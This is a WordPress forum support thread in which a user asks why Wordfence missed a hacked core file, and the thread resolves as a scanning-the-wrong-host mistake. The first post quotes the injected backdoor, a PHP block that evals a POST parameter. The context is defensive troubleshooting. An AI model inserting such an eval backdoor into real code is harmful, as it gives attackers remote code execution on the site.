WordPress.org

Ready to get started?Download WordPress

Forums

Wordfence Security
[resolved] Wordfence not finding changed core file (3 posts)

  1. sneader
    Member
    Posted 1 year ago #

    I have a customer with a hacked WP installation. I see in their xmlrpc.php file that it is littered with:

    if (isset($_POST['wp-load'])) {
    eval($_POST['wp-load']);
    };

    I downloaded a fresh copy of WordPress 3.5.1, and the xmlrpc.php file doesn't have these lines anywhere.

    I am running a scan, with the checkbox "Scan core files against repository versions for changes" checked.

    Yet, the scan comes up clean! I have looked under the Ignored tab, and there is nothing.

    What could possibly prevent Wordfence from noticing a hacked core file that differs considerably from the one at the repository?

    - Scott

    http://wordpress.org/extend/plugins/wordfence/

  2. Wordfence
    Member
    Plugin Author

    Posted 1 year ago #

    Hi Scott,

    Perhaps the file isn't a core file. Sorry to state the obvious, but does the file perhaps have the same name as a core file but is in a different directory? Let me know what the full path is and I'll check.

    Thanks,

    Mark.

  3. sneader
    Member
    Posted 1 year ago #

    Hi Mark. I replied to this to close out the thread, but I see it didn't stick. It turns out the customer had hacked files on our server, but their DNS was still pointing to another host. So, we were running the scans one host, and looking at files on another host! Egg on face.

    Wordfence is awesome and I am so glad you have put all this work into this product. I can't thank you enough.

    I'm sorry I wasn't able to remove the thread or otherwise stop you from wasting your time on this non-issue.

    - Scott

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic

Tags

No tags yet.